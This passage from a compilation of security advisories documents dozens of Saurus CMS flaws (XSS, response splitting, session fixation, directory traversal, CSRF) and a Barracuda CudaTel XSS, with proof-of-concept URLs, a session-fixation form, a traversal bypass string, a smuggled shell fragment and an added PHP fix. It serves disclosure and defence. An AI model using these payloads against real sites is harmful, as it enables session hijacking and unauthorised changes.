defaultDate: new Date(<?=$year;?>, <?=$month;?> - 1, <?=$day;?>),
------------------------[ source code end ]------------------------------------

Tests:

http://localhost/saurus471/editor/kalender.php?form=</script><script>alert(123);</script>
http://localhost/saurus471/editor/kalender.php?vorm=</script><script>alert(123);</script>
http://localhost/saurus471/editor/kalender.php?form_field=</script><script>alert(123);</script>
http://localhost/saurus471/editor/kalender.php?lahter=</script><script>alert(123);</script>
http://localhost/saurus471/editor/kalender.php?/saurus471/admin/&month=1</script><script>alert(123);</script>

Results: javascript alert boxes pop up, confirming Reflected XSS vulnerabilities.

###############################################################################
21. Reflected XSS in "admin/delete_log.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameter "tbl"
Preconditions:
1. logged in as Saurus CMS admin

Php script "admin/delete_log.php" line 176:
------------------------[ source code start ]----------------------------------
<input type="hidden" name="tbl" value="<?=$site->fdat['tbl']?>">
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/delete_log.php?tbl="><script>alert(123);</script>

Result: javascript alert box pops up, confirming Reflected XSS vulnerability.

###############################################################################
22. Reflected XSS in "admin/edit_adminpage.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameters "id" and "op"
Preconditions:
1. logged in as Saurus CMS admin

Tests:

http://localhost/saurus471/admin/edit_adminpage.php?id="><script>alert(123);</script>
http://localhost/saurus471/admin/edit_adminpage.php?op="><script>alert(123);</script>

Results: javascript alert boxes pop up, confirming Reflected XSS vulnerabilities.

###############################################################################
23. Reflected XSS in "admin/edit_group.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameter "group_id"
Preconditions:
1. logged in as Saurus CMS admin

Tests:

http://localhost/saurus471/admin/edit_group.php?op=edit&group_id=1"><script>alert(123);</script>

Result: javascript alert boxes pop up, confirming Reflected XSS vulnerabilities.

###############################################################################
24. Reflected XSS in "admin/profile_data.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameter "profile_id"
Preconditions:
1. logged in as Saurus CMS admin

Php script "admin/profile_data.php" line 65:
------------------------[ source code start ]----------------------------------
print "<font color=red><b>Profile '".$site->fdat['profile_id']."' not found!</b></font>";
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/profile_data.php?profile_id=<script>alert(123);</script>

Result: javascript alert box pops up, confirming Reflected XSS vulnerability.

###############################################################################
25. Reflected XSS in "admin/edit_object.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameter "profile_id"
Preconditions:
1. logged in as Saurus CMS admin

Php script "admin/edit_object.php" line 101:
------------------------[ source code start ]----------------------------------
print "<font color=red><b>Profile '".$profile_id."' not found!</b></font>";
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/edit.php?tab=object&op=new&&tyyp_id=20&profile_id=,<script>alert(123);</script>

Result: javascript alert box pops up, confirming Reflected XSS vulnerability.

###############################################################################
26. Reflected XSS in "admin/edit_profile.php"
###############################################################################

Reason:
1. improper encoding or escaping of output
Attack vector:
1. user-supplied parameter "pid"
Preconditions:
1. 
logged in as Saurus CMS admin Php script "admin/edit_profile.php" line 997: ------------------------[ source code start ]---------------------------------- print "<font color=red><b>Profile '".$site->fdat['pid']."' not found!</b></font>"; ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/admin/edit_profile.php?op=edit&did=1&pid=<script>alert(123);</script> Result: javascript alert box pops up, confirming Reflected XSS vulnerability. ############################################################################### 27. Reflected XSS in "admin/profiles.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied parameters "profile_id", "source_table", "did" Preconditions: 1. logged in as Saurus CMS admin Php script "admin/profiles.php" line 247: ------------------------[ source code start ]---------------------------------- <TD class="scms_dropdown_item"><a href="javascript:void(openpopup ('edit_profile.php?op=newdef&pid=<?= $site->fdat['profile_id'] ?> .. <TD class="scms_dropdown_item"><a href="javascript:void(openpopup ('edit_profile.php?op=new&pid=<?= $site->fdat['profile_id']?> &source_table=<?= $site->fdat['source_table']?> .. <TD nowrap><?if($site->fdat['profile_id']){?><a href="javascript:void(openpopup ('edit_profile.php?op=edit&pid=<?= $site->fdat['profile_id']?> &did=<?= $site->fdat['did']?>' .. <TD><?if($site->fdat['profile_id']){?><a href="javascript:void(openpopup ('edit_profile.php?op=delete&pid=<?= $site->fdat['profile_id']?> .. <TD><?if($site->fdat['profile_id']){?><a href="javascript:void(openpopup ('edit_profile.php?op=duplicate&pid=<?= $site->fdat['profile_id']?> &did=<?=$site->fdat['did']?>' .. 
<TD><a href="<?= $site->self ?>?profile_id=<?= $site->fdat['profile_id']?>&op=sync" ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/admin/profiles.php?profile_id="><script>alert(123);</script> http://localhost/saurus471/admin/profiles.php?source_table="><script>alert(123);</script> http://localhost/saurus471/admin/profiles.php?profile_id=z&did="><script>alert(123);</script> Results: javascript alert boxes popping up, confirming Reflected XSS vulnerability. ############################################################################### 28. Reflected XSS in "admin/sys_alias.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied parameters "flt_keel" and "keel_id" Preconditions: 1. logged in as Saurus CMS admin Test: http://localhost/saurus471/admin/sys_alias.php?flt_keel="><script>alert(123);</script> http://localhost/saurus471/admin/sys_alias.php?keel_id="><script>alert(123);</script> Result: javascript alert boxes popping up, confirming Reflected XSS vulnerability. ############################################################################### 29. Reflected XSS in "admin/sys_sonad_loetelu.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied parameters "flt_keel" Preconditions: 1. logged in as Saurus CMS admin Test: http://localhost/saurus471/admin/sys_sonad_loetelu.php?flt_keel=</script><script>alert(123);</script> Result: javascript alert box pops up, confirming Reflected XSS vulnerability. ############################################################################### 30. Reflected XSS in "admin/user_management.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. 
all user-supplied parameters (excluding "selected_devices") Preconditions: 1. logged in as Saurus CMS admin Php script "admin/user_management.php" line 138: ------------------------[ source code start ]---------------------------------- foreach($site->fdat as $fdat_field=>$fdat_value) { if($fdat_field != 'selected_devices'){ echo '<input type=hidden id="selectform_'.$fdat_field.'" name="'.$fdat_field.'" value="'.$fdat_value.'">'; } ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/admin/user_management.php?foobar="><script>alert(123);</script> Result: javascript alert box pops up, confirming Reflected XSS vulnerability. ############################################################################### 31. Reflected XSS in "admin/permissions.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied parameters "selected_group", "user_id", "group_id" and "role_id" Preconditions: 1. 
logged in as Saurus CMS admin Php script "admin/permissions.php" line 229: ------------------------[ source code start ]---------------------------------- <input type=hidden id="selectform_selected_group" name="selected_group" value="<?=$site->fdat['selected_group']?>"> <input type=hidden id="selectform_user_id" name="user_id" value="<?=$site->fdat['user_id']?>"> <input type=hidden id="selectform_group_id" name="group_id" value="<?=$site->fdat['group_id']?>"> ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/admin/permissions.php?selected_group="><script>alert(123);</script> http://localhost/saurus471/admin/permissions.php?user_id="><script>alert(123);</script> http://localhost/saurus471/admin/permissions.php?group_id="><script>alert(123);</script> http://localhost/saurus471/admin/permissions.php?role_id="><script>alert(123);</script> Result: javascript alert boxes popping up, confirming Reflected XSS vulnerability. ############################################################################### 32. Reflected XSS in "admin/file_source.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied GET parameter "selected_group" Preconditions: 1. logged in as Saurus CMS admin Php script "admin/file_source.php" line 47: ------------------------[ source code start ]---------------------------------- $callback = (string)$_GET['callback']; .. <?=$callback;?>("<?=str_replace(array('"', "\n", "\r"), array('\"', '\n', '\r'), $fcontent);?>"); ------------------------[ source code end ]------------------------------------ Test (parameter "file" must be valid): http://localhost/saurus471/admin/file_source.php?file=public/test.php&callback=alert(123);// Result: javascript alert box pops up, confirming Reflected XSS vulnerability. ############################################################################### 33. 
Reflected XSS in "admin/change_config.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied parameter "flt_keel" and "group" Preconditions: 1. logged in as Saurus CMS admin Php script "admin/change_config.php" line 1220: ------------------------[ source code start ]---------------------------------- <input type=hidden name=flt_keel value="<?=$site->fdat['flt_keel']?>"> .. <input type="hidden" name="group" value="<?=$site->fdat['group']?>"> ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/admin/change_config.php?group=1&flt_keel="><script>alert(123);</script> http://localhost/saurus471/admin/change_config.php?group="><script>alert(123);</script> Result: javascript alert boxes popping up, confirming Reflected XSS vulnerability. ############################################################################### 34. Reflected XSS in "admin/forms.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. user-supplied parameter "form_id" Preconditions: 1. logged in as Saurus CMS admin Php script "admin/forms.php" line 222: ------------------------[ source code start ]---------------------------------- if($site->fdat['op'] == 'delete' && $site->fdat['form_id']) { .. <input type=hidden name=form_id value="<?=$site->fdat['form_id']?>"> ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/admin/forms.php?op=delete&form_id="><script>alert(123);</script> Result: javascript alert box pops up, confirming Reflected XSS vulnerability. ############################################################################### 35. Reflected XSS in "admin/lang_file.php" ############################################################################### Reason: 1. 
improper encoding or escaping of output Attack vector: 1. user-supplied parameter "flt_keel" and "keel_id" Preconditions: 1. logged in as Saurus CMS admin Php script "admin/lang_file.php" line 204: ------------------------[ source code start ]---------------------------------- $keel_id = isset($site->fdat[flt_keel]) ? $site->fdat[flt_keel] : $site->fdat[keel_id]; .. <input type=hidden name=keel_id value="<?=$keel_id ?>"> ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/admin/lang_file.php?op=import&flt_keel="><script>alert(123);</script> http://localhost/saurus471/admin/lang_file.php?op=import&keel_id="><script>alert(123);</script> Result: javascript alert boxes popping up, confirming Reflected XSS vulnerability. ############################################################################### 36. Reflected XSS in "admin/select_group.php" ############################################################################### Reason: 1. improper encoding or escaping of output Attack vector: 1. all user-supplied parameters (excluding "selected_devices") Preconditions: 1. logged in as Saurus CMS admin Php script "admin/select_group.php" line 442: ------------------------[ source code start ]---------------------------------- foreach($site->fdat as $fdat_field=>$fdat_value) { if($fdat_field != 'selected_devices'){ echo '<input type=hidden id="selectform_'.$fdat_field.'" name="'.$fdat_field.'" value="'.$fdat_value.'"> ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/admin/select_group.php?foobar="><script>alert(123);</script> Result: javascript alert box pops up, confirming Reflected XSS vulnerability. ############################################################################### 37. HTTP Response Splitting and insecure redirection in "redirect.php" ############################################################################### Reason: 1. 
insufficient sanitization of user-supplied data Attack vector: 1. user-supplied GET parameter "url" Preconditions: 1. php version < 4.4.2 or < 5.1.2 Php script "redirect.php" line 100: ------------------------[ source code start ]---------------------------------- if($_GET['url']) { $url = urldecode($_GET['url']); //prevent Response Splitting attack $url = preg_replace("!\r|\n.*!s", "", $url); header('Location: '.$_GET['url']); ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/redirect.php?url=war%0d%0axe Result (using php 5.3.24): Warning: Header may not contain more than a single header, new line detected in C:\apache_www\saurus471\redirect.php on line 106 Test: http://localhost/saurus471/redirect.php?url=http://php.net/ Result: successful redirection ############################################################################### 38. HTTP Response Splitting and insecure redirection in "editor/redirect.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied GET parameter "url" Preconditions: 1. 
php version < 4.4.2 or < 5.1.2 Php script "editor/redirect.php" line 100: ------------------------[ source code start ]---------------------------------- if($_GET['url']) { $url = urldecode($_GET['url']); //prevent Response Splitting attack $url = preg_replace("!\r|\n.*!s", "", $url); header('Location: '.$_GET['url']); ------------------------[ source code end ]------------------------------------ Test: http://localhost/saurus471/editor/redirect.php?url=war%0d%0axe Result (using php 5.3.24): Warning: Header may not contain more than a single header, new line detected in C:\apache_www\saurus471\editor\redirect.php on line 106 Test: http://localhost/saurus471/editor/redirect.php?url=http://php.net/ Result: successful redirection ############################################################################### 39. HTTP Response Splitting in "idcard/index.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied GET and POST parameters "targeturl" Preconditions: 1. HTTPS connection needed ("SSLRequireSSL" directive in ".htaccess" file) 2. php version < 4.4.2 or < 5.1.2 Php script "idcard/index.php" line 9: ------------------------[ source code start ]---------------------------------- if($_GET['targeturl']) { $targeturl = '?target_url='.$_GET['targeturl']; } elseif($_POST['targeturl']) { $targeturl = '?target_url='.$_POST['targeturl']; } header('Location: ../idcard.php'.$targeturl); ------------------------[ source code end ]------------------------------------ ############################################################################### 40. HTTP Response Splitting in "admin/lang_file.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied parameters "flt_keel" and "keel_id" Preconditions: 1. php version < 4.4.2 or < 5.1.2 2. 
logged in as Saurus CMS admin Php script "admin/lang_file.php" line 44: ------------------------[ source code start ]---------------------------------- $keel_id = isset($site->fdat[flt_keel]) ? $site->fdat[flt_keel] : $site->fdat[keel_id]; .. if ($site->fdat['op'] == 'export' && $site->fdat['op2'] == 'salvesta'){ header("Content-Disposition: attachment; filename=\"language".$keel_id.".csv\""); ------------------------[ source code end ]------------------------------------ Tests: http://localhost/saurus471/admin/lang_file.php?op=export&op2=salvesta&flt_keel=%0d%0a http://localhost/saurus471/admin/lang_file.php?op=export&op2=salvesta&keel_id=%0d%0a Result (using php 5.3.24, from errorlog): Header may not contain more than a single header, new line detected ############################################################################### 41. HTTP Response Splitting in "admin/publish.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied parameter "url" Preconditions: 1. php version < 4.4.2 or < 5.1.2 2. logged in as Saurus CMS user with publish privileges Php script "admin/publish.php" line 118: ------------------------[ source code start ]---------------------------------- header("Location: ".(empty($_SERVER['HTTPS']) ? 'http://' : 'https://').$site->CONF[hostname].$site->fdat[url]); ------------------------[ source code end ]------------------------------------ ############################################################################### 42. HTTP Response Splitting in "add_comment.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied parameters "tpl", "c_tpl", "id", "redirect_url" Preconditions: 1. 
php version < 4.4.2 or < 5.1.2 Php script "add_comment.php" line 135: ------------------------[ source code start ]---------------------------------- header('Location: '.urldecode(preg_replace("!\r|\n.*!s", "", $_POST['redirect_url'])).'&lisa_alert=2'); .. header('Location: '.(empty($_SERVER['HTTPS']) ? 'http://': 'https://').$site->CONF['hostname'].$site->CONF['wwwroot']. ($site->in_editor?'/editor':'').'/?'.(($site->fdat['tpl'] || $site->fdat['c_tpl'])&&!$site->fdat['inserted_id']&& !$site->fdat['jump_to_parent']?'tpl='.$site->fdat['tpl']. '&c_tpl='.$site->fdat['c_tpl'].'&':'').'id='.$site->fdat['id'].'&lisa_alert=2'); .. if ($site->fdat['output_device'] == 'pda') { if (strlen($site->fdat['text']) < 2 || strlen($site->fdat['nimi']) < 2) { myRedirect($site->fdat['redirect_url']); .. header("Location: ".urldecode($site->fdat['redirect_url'])); .. function myRedirect($url) { .. header("Location: " . urldecode($url)); } ------------------------[ source code end ]------------------------------------ ############################################################################### 43. Information leakage in "admin/check_requirements.php" ############################################################################### Reason: insufficient access control Test: http://localhost/saurus471/admin/check_requirements.php Result: Simple GET request as shown above reveals some information about web server: MySQL version, Webserver version, PHP version, multiple php setting values, multiple directory permissions. Anyone can access this diagnostic script, no access control exist. ############################################################################### 44. Session Fixation vulnerability in "admin/ajax_response.php" ############################################################################### Attack vector: 1. 
user-supplied POST parameter "PHPSESSID" Preconditions: none Some years ago PHP session fixation attacks were easy to exploit: just add PHPSESSID=112233445566 to URI and done. Modern PHP versions are more secure by default: PHP setting "session.use_only_cookies" defaults to "1" since 5.3.0, "session.use_trans_sid" defaults to "0". So even if PHP-based web application does have session fixation vulnerability, many real world installations are hard to exploit. Now let's look at Saurus CMS source code. Php script "admin/ajax_response.php" line 27: ------------------------[ source code start ]---------------------------------- if(isset($_POST['PHPSESSID'])) { session_id($_POST['PHPSESSID']); session_start(); } ------------------------[ source code end ]------------------------------------ We can see, that user-submitted POST parameter PHPSESSID is used as argument for PHP function "session_id()", which is followed by "session_start()". It means, that even if "session.use_only_cookies=1" and "session.use_trans_sid=0", session fixation attacks are possible. 
Test: <html><body><center> <form action="http://localhost/saurus471/admin/ajax_response.php" method="post"> <input type="hidden" name="PHPSESSID" value="1122334455667788"> <input type="submit" value="Test"> </form> </center></body></html> Press "Test button" and then observe server response: HTTP/1.1 200 OK Date: Wed, 05 Jun 2013 10:26:19 GMT Server: Apache/2.2.22 (Win32) DAV/2 mod_ssl/2.2.22 OpenSSL/0.9.8t Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=1122334455667788; path=/ Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/javascript Now log in as Saurus CMS admin and look for session cookies: GET /saurus471/admin/index.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: logged=1; PHPSESSID=1122334455667788 Connection: keep-alive We can see, that after authentication session ID does not change, which indicates Session Fixation vulnerability existence. Solution: implement session ID renewal after successful user authentication. ############################################################################### 45. Directory Traversal vulnerability in "admin/ajax_response.php" ############################################################################### Reason: 1. insufficient sanitization of user-supplied data Attack vector: 1. user-supplied parameter "name" Preconditions: 1. logged in as valid Saurus CMS user Result: logged in Saurus CMS user can test existence of arbitrary files on remote server filesystem. 
Php script "admin/ajax_response.php" line 52: ------------------------[ source code start ]---------------------------------- // check if a file exists if($site->user->user_id && $_REQUEST['op'] == 'check_file' && $site->fdat['name']) { include_once($class_path.'adminpage.inc.php'); $pathinfo = str_replace(array('../', './', '..\\', '.\\'), '', $site->fdat['name']); $pathinfo = explode('/', $pathinfo); $filename = create_alias_from_string($pathinfo[count($pathinfo) - 1],true); unset($pathinfo[count($pathinfo) - 1]); $dirname = implode('/', $pathinfo); if(file_exists($site->absolute_path.$dirname.'/'.$filename)) { echo '{"file_exists": 1}'; } else { echo '{"file_exists": 0}'; } ------------------------[ source code end ]------------------------------------ As seen above, php function "str_replace()" is used for filtering out possible directory traversal substrings. Such filtering is not secure enough and can be bypassed with specially crafted parameter "name". Test 1: http://localhost/saurus471/admin/ajax_response.php?op=check_file&name=..././..././/..././..././/..././..././/foobar.txt Result: {"file_exists": 0} Test 2: http://localhost/saurus471/admin/ajax_response.php?op=check_file&name=..././..././/..././..././/..././..././/test.txt Result: {"file_exists": 1} ############################################################################### 46. Cross-Site Request Forgery in "admin/trash.php" ############################################################################### Reason: 1. missing CSRF token checks Result: 1. 
Unauthorized deletion of objects from Recycle Bin Php script "admin/trash.php" line 85: ------------------------[ source code start ]---------------------------------- if($site->fdat['delete_all'] && count($site->fdat['objects'])) { //empty trash for($i = count($site->fdat['objects']) - 1; $i >= 0; $i--) { foreach($site->fdat['objects'][$i] as $object_id => $values) if($object_id) { $delete_objs = new Alamlist(array( 'parent' => $object_id, 'klass' => $classes, )); while($object = $delete_objs->next()) { $object->del(); ------------------------[ source code end ]------------------------------------ As seen above, there is no protection against CSRF. Test: http://localhost/saurus471/admin/trash.php?delete_all=1&objects[]=1 Result (from sitelog): "Recycle Bin emptied" Solution: use "verify_form_token()" function in critical places ############################################################################### 47. Cross-Site Request Forgery in "admin/change_config.php" ############################################################################### Reason: 1. missing CSRF token checks Result: 1. Unauthorized modification of site configuration Php script "admin/change_config.php" line 85: ------------------------[ source code start ]---------------------------------- if ($site->fdat[salvesta]==1) { foreach ($site->fdat as $key=>$value) { if ( substr ($key, 0, 4) == "cff_" ) { $sql = $site->db->prepare("UPDATE config SET sisu=? WHERE nimi=?", $value, substr ($key, 4)); $sth = new SQL($sql); ------------------------[ source code end ]------------------------------------ We can see, that there is no protection against CSRF. 
Tests: http://localhost/saurus471/admin/change_config.php?salvesta=1&cff_save_error_log=0 http://localhost/saurus471/admin/change_config.php?salvesta=1&cff_save_error_log=1 Result: Saurus CMS configuration setting "save_error_log" has been changed Solution: use "verify_form_token()" function in critical places ############################################################################### 48. Cross-Site Request Forgery in "admin/forms.php" ############################################################################### Reason: 1. missing CSRF token checks Result: 1. Unauthorized deletion of forms Php script "admin/forms.php" line 137: ------------------------[ source code start ]---------------------------------- if($site->fdat['op2'] == 'deleteconfirmed' && $site->fdat['form_id']) { # delete form $sql = $site->db->prepare("DELETE FROM forms WHERE form_id=?",$site->fdat['form_id']); $sth = new SQL($sql); ------------------------[ source code end ]------------------------------------ We can see, that there is no protection against CSRF. Test: http://localhost/saurus471/admin/forms.php?op2=deleteconfirmed&form_id=5 Result (from sitelog): "Form 'testform' deleted" Solution: use "verify_form_token()" function in critical places ############################################################################### 49. Full Path Disclosure in multiple scripts ############################################################################### Preconditions: 1. 
PHP setting "display_errors = On" Tests: http://localhost/saurus471/admin/edit_object.php Fatal error: Call to a member function msg() on a non-object in C:\apache_www\saurus471\admin\edit_object.php on line 1299 http://localhost/saurus471/admin/edit_pilt.php Fatal error: Class 'Timer' not found in C:\apache_www\saurus471\admin\edit_pilt.php on line 21 http://localhost/saurus471/admin/templates.php Fatal error: Call to a member function msg() on a non-object in C:\apache_www\saurus471\admin\templates.php on line 57 Disclosure timeline: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 06.06.2013 -> First email to vendor 06.06.2013 -> First response email from vendor 06.06.2013 -> Sending detailed information to vendor 07.06.2013 -> Vendor started fixing found problems 21.06.2013 -> Found problems are fixed 14.07.2013 -> Current advisory released Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ come2waraxe@yahoo.com Janek Vind "waraxe" Waraxe forum: http://www.waraxe.us/forums.html Personal homepage: http://www.janekvind.com/ Random project: http://albumnow.com/ ---------------------------------- [ EOF ] ------------------------------------
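An added example for item 45 above (my own code, not Saurus CMS code; needs PHP 7.1 or later): it runs the advisory's Test 1 "name" value through the same single-pass str_replace() filter to show why the `..././` construction survives it, and then applies a realpath() containment check of the kind that a file-existence probe should use instead. The temporary web root, the file names and the helper function names are constructed for the demo.

```php
<?php
// Added example, not Saurus CMS code (PHP 7.1+): why the str_replace() filter
// quoted in item 45 is bypassable, and a realpath()-based containment check
// that answers "file exists" only for files strictly inside the web root.

// The filter exactly as the advisory quotes it: str_replace() makes one pass
// per search string and never rescans what the previous pass produced.
function filter_like_saurus(string $name): string
{
    return str_replace(array('../', './', '..\\', '.\\'), '', $name);
}

// Hardened check (constructed name). Returns true only when $name resolves to
// an existing regular file below $base; missing, outside and malformed names
// all return false, so the caller cannot tell "outside" from "absent".
function file_exists_inside(string $base, string $name): bool
{
    $baseReal = realpath($base);
    if ($baseReal === false) {
        return false;
    }
    // A NUL byte is never valid in a file name and truncates C-level paths.
    if (strpos($name, "\0") !== false) {
        return false;
    }
    // realpath() canonicalises '..', '.', doubled separators and symlinks,
    // and returns false when the target does not exist.
    $candidate = realpath($baseReal . DIRECTORY_SEPARATOR . $name);
    if ($candidate === false) {
        return false;
    }
    // Containment: the canonical path must start with "<base>/".
    $prefix = rtrim($baseReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return false;
    }
    return is_file($candidate);
}

// Constructed layout: a temporary "web root" three directories deep with one
// file inside it, plus a file three levels up that the payload points at.
$root = sys_get_temp_dir() . '/xmpl_' . bin2hex(random_bytes(4)) . '/a/b/c';
mkdir($root, 0700, true);
file_put_contents($root . '/test.txt', "inside\n");
$outside = dirname($root, 3) . '/foobar.txt';
file_put_contents($outside, "outside\n");

// The "name" value from the advisory's Test 1.
$payload = '..././..././/..././..././/..././..././/foobar.txt';

// First pass removes one "../" from each "..././"; the following "./" pass
// then collapses what is left back into plain "../" segments, so the
// traversal survives the filter.
$filtered = filter_like_saurus($payload);
echo "after filter : ", $filtered, "\n";
echo "naive check  : ", var_export(file_exists($root . '/' . $filtered), true), "\n";

// The containment check refuses the escaped path but still finds files
// that really are below the root.
echo "contained    : ", var_export(file_exists_inside($root, $payload), true), "\n";
echo "test.txt     : ", var_export(file_exists_inside($root, 'test.txt'), true), "\n";

// Remove the constructed files and directories again.
unlink($outside);
unlink($root . '/test.txt');
foreach (array(0, 1, 2, 3) as $up) {
    rmdir($up === 0 ? $root : dirname($root, $up));
}
```

realpath() follows symlinks, so a symlink inside the root that points outside it is resolved and rejected too; if symlinked content is legitimate, allow-list those targets explicitly rather than weakening the prefix check.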
15. Description : Barracuda CudaTel version 2.6.02.040 suffers from a cross site scripting vulnerability.
Author : Benjamin Kunz Mejri
Source : Barracuda CudaTel 2.6.02.040 Cross Site Scripting - Packet Storm
Code :

Title:
======
Barracuda CudaTel 2.6.02.040 - Client Side Cross Site Scripting Vulnerability

Date:
=====
2013-07-15

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=776

BARRACUDA NETWORK SECURITY ID: BNSEC-807

VL-ID:
=====
776

Common Vulnerability Scoring System:
====================================
2.1

Introduction:
=============
Designed to enable seamless voice and video communication, the CudaTel Communication Server is an easy-to-use, affordable,
next-generation phone system for businesses. CudaTel Communication Server s enterprise-class feature set includes Voice over
IP (VoIP) PBX services, conferencing, follow-me, automated attendant services, and more, controlled by an easy-to-use Web
interface. CudaTel Communication Server is compatible with any SIP device and provider, and can be pre-configured for use
with both analog and digital telephone networks.

Powerful, Complete Solution

With an expansive feature set and no per user or phone licensing fees, the CudaTel Communication Server is equipped and
priced for organizations of any size. Native High Definition audio support and integrated phone line (TDM) hardware produces
an unparalleled audio experience. VOIP encryption protects calls from hackers and digital eavesdroppers.

(Copy of the Vendor Homepage: http://www.barracudanetworks.ca/cudatel.aspx )

Abstract:
=========
The Vulnerability Laboratory Research Team discovered a client side web vulnerability in Barracuda Networks CudaTel v2.6.002.040 appliance application.

Report-Timeline:
================
2012-11-26: Researcher Notification & Coordination
2012-11-27: Vendor Notification
2012-12-01: Vendor Response/Feedback
2013-04-03: Vendor Fix/Patch
2012-07-15: Public Disclosure

Status:
========
Published

Affected Products:
==================
Barracuda Networks
Product: CudaTel - Communication Server 2.6.002.040

Exploitation-Technique:
=======================
Remote

Severity:
=========
Medium

Details:
========
A client side input validation vulnerability is detected in Barracuda Networks CudaTel v2.6.002.040 appliance application.
The non-persistent vulnerability allows remote attackers to manipulate website links to provoke malicious client side
(application-side) requests.

The second vulnerability (client side) is located in the `error:Internal Error` exception handling. When remote attackers
provoke to load an invalid request the exception-handling will display the earlier inserted bbx_hostname (malicious) web
context (exp. script codes). The attacker can use the vulnerable bbx_backup_site_host parameter of the test connection
listing module to provoke an evil application exception-handling request.

Successful exploitation of the vulnerability results in client side phishing, client side session hijacking and client side
external redirects to malware or evil websites. Exploitation of the vulnerability requires medium application user interaction.

Vulnerable Section(s):
    [+] Test - Connection

Vulnerable Module(s):
    [+] Exception-handling [Internal Error] - Listing

Vulnerable Parameter(s):
    [+] bbx_backup_site_host

Proof of Concept:
=================
The vulnerability can be exploited by remote attackers with low or medium required user interaction and without privileged
application user account. For demonstration or reproduce ...

Review: Exception-handling [Internal Error] - Listing [bbx_backup_site_host]

<pre>--- error: "Internal error.\n[backup] Can't connect to >\"<iframe src="test3-Dateien/a.htm" href="http://vuln-lab.com/?content-type=text/html">http://vuln-lab.com</a>>"
</pre></body></html></iframe></pre>

PoC:
http://cudatel.ptest.cudasvc.com/gui/backup/test
?_=1353975862209&bbx_backup_site_id=2&bbx_backup_site_type=ftp
&bbx_backup_site_host=%3E%22%3Ciframe%20src=http://vulnerability-lab.com%3E&bbx_backup_site_port=8&bbx_backup_site_user=BENJAMINKM
&bbx_backup_site_path=%2F+%26+echo+%3E+%2Fdata%2Fsounds%2Fmusic%2F8%2F2a10577f-6764-4368-8571-44d42e4695ff

Solution:
=========
The vulnerability can be patched by parsing the vulnerable bbx_backup_site_host parameter request.
Parse the internal error exception-handling when processing to display the error string of the requested parameter. (error context)

2013-04-03: Vendor Fix/Patch

Note: Barracuda Networks provided a download in the customer section but also automatic update to patch the issue in the appliance series.

Risk:
=====
The security risk of the client side input validation vulnerability is estimated as medium(-) because of the main location in the exception-handling.

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)
  16. Description : Nikon CoolPix L Series Fw version 1.0 suffers from an information disclosure vulnerability.
  Author : Benjamin Kunz Mejri
  Source : Nikon CoolPix L Series Fw 1.0 Information Disclosure ≈ Packet Storm
  Code :

Title:
======
Nikon CoolPix L Series Fw 1.0 - Information Disclosure Issue

Date:
=====
2013-07-16

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=1014

VL-ID:
=====
1014

Common Vulnerability Scoring System:
====================================
3.5

Introduction:
=============
Attractive, sturdy and easy to use, the 16-megapixel COOLPIX L27 & 25 is clever with images—so you don’t have to be. Simple controls and smart automatic technology deliver steady images and ensure you capture portraits with smiling faces and open eyes, through the NIKKOR wide-angle 5x optical zoom lens. A large 6.7-cm (2.7-in.) LCD screen displays images with superb clarity at any time of day or night and you can switch to filming the action at the touch of a button, or set the camera to Easy Auto mode and capture photos without worrying about a thing.

